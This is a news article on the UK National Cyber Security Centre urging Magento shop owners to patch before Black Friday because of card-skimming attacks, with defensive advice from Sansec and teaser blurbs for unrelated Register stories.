Ecommerce platforms (cough, Magento) need patching before Black Friday, warns UK's National Cyber Security Centre

You're your own security team, remember?


If you run a small online business powered by the Magento ecommerce platform, Britain's National Cyber Security Centre (NCSC) is begging you to make sure it's fully patched ahead of Black Friday.

"Retailers are urged to ensure that Magento – and any other software they use – is up to date," said the GCHQ offshoot in a statement today, adding it had notified 4,151 online stores that their Magento installations were vulnerable to compromise by criminals.

"The majority of the online shops used for skimming identified by the NCSC had been compromised via a known vulnerability in Magento, a popular e-commerce platform," said the cybersecurity agency.

Magento is one of the more widely used open source e-commerce platforms. Although the company was bought out by Adobe a few years ago and a paid, managed version is available, many SMEs are skipping that to cut costs.

Compromising Magento to steal customers' credit card details is a problem that has lingered for years – and the barrier to entry for this kind of digital crime isn't very high, as Dutch infosec firm Sansec noted last year after spotting a video offering Magento hacking tips for just $5,000.

Willem de Groot, MD of Sansec, told The Register that card-skimming is a real headache around this time of year.

"Every year," he lamented, "Sansec observes an uptick in online skimming incidents in the week before Black Friday. Since 2015, we have discovered more than 60,000 online stores with an injected payment skimmer."

He recommended double-checking that Magento installations are fully up to date (the latest open source version is 2.4.3-p1) and enabling multi-factor authentication on staff accounts – and also encouraged consumers to use so-called "one-time" credit card numbers, which are available through some banks.

NCSC deputy director for economy and society Sarah Lyons said in a canned statement: "We want small and medium-sized online retailers to know how to prevent their sites being exploited by opportunistic cyber criminals over the peak shopping period."

Generic IT advice, including stuff aimed at non-techies, is available on the NCSC website.

Attacks on Magento installations are so popular in the criminal underworld that they spawned an entire industry of card thieves loosely known as Magecart. Magecart gangs mostly target ecommerce platforms, no longer limiting themselves to the Adobe-owned software that proved so lucrative for them.

Infosec firm RiskIQ, one of many vendors tracking Magecart's various Hydra-like incarnations, noted in 2019: "Web skimming goes well beyond Magento. Skimming groups target almost any web environment, including dozens of other online shopping platforms used by stores around the world."

Magecart groups were behind the infamous compromises of British Airways and Ticketmaster.

There's one more thing that everyone can do to protect themselves against card fraud during this weekend's US-inspired Black Friday/Cyber Monday shopping frenzy.

"Monitor your card statements, especially in the holiday season," warned Sansec's de Groot. ®

Similar topics


Other stories you might like

  • India reveals home-grown server that won't worry the leading edge

    And a National Blockchain Strategy that calls for gov to host BaaS

    India's government has revealed a home-grown server design that is unlikely to threaten the pacesetters of high tech, but (it hopes) will attract domestic buyers and manufacturers and help to kickstart the nation's hardware industry.

    The "Rudra" design is a two-socket server that can run Intel's Cascade Lake Xeons. The machines are offered in 1U or 2U form factors, each at half-width. A pair of GPUs can be equipped, as can DDR4 RAM.

    Cascade Lake emerged in 2019 and has since been superseded by the Ice Lake architecture launched in April 2021. Indian authorities know Rudra is off the pace, and said a new design capable of supporting four GPUs is already in the works with a reveal planned for June 2022.

    Continue reading
  • Prisons transcribe private phone calls with inmates using speech-to-text AI

    Plus: A drug designed by machine learning algorithms to treat liver disease reaches human clinical trials and more

    In brief Prisons around the US are installing AI speech-to-text models to automatically transcribe conversations with inmates during their phone calls.

    A series of contracts and emails from eight different states revealed how Verus, an AI application developed by LEO Technologies and based on a speech-to-text system offered by Amazon, was used to eavesdrop on prisoners’ phone calls.

    In a sales pitch, LEO’s CEO James Sexton told officials working for a jail in Cook County, Illinois, that one of its customers in Calhoun County, Alabama, uses the software to protect prisons from getting sued, according to an investigation by the Thomson Reuters Foundation.

    Continue reading
  • Battlefield 2042: Please don't be the death knell of the franchise, please don't be the death knell of the franchise

    Another terrible launch, but DICE is already working on improvements

    The RPG Greetings, traveller, and welcome back to The Register Plays Games, our monthly gaming column. Since the last edition on New World, we hit level cap and the "endgame". Around this time, item duping exploits became rife and every attempt Amazon Games made to fix it just broke something else. The post-level 60 "watermark" system for gear drops is also infuriating and tedious, but not something we were able to address in the column. So bear these things in mind if you were ever tempted. On that note, it's time to look at another newly released shit show – Battlefield 2042.

    I wanted to love Battlefield 2042, I really did. After the bum note of the first-person shooter (FPS) franchise's return to Second World War theatres with Battlefield V (2018), I stupidly assumed the next entry from EA-owned Swedish developer DICE would be a return to form. I was wrong.

    The multiplayer military FPS market is dominated by two forces: Activision's Call of Duty (COD) series and EA's Battlefield. Fans of each franchise are loyal to the point of zealotry with little crossover between player bases. Here's where I stand: COD jumped the shark with Modern Warfare 2 in 2009. It's flip-flopped from WW2 to present-day combat and back again, tried sci-fi, and even the Battle Royale trend with the free-to-play Call of Duty: Warzone (2020), which has been thoroughly ruined by hackers and developer inaction.

    Continue reading

Biting the hand that feeds IT © 1998–2021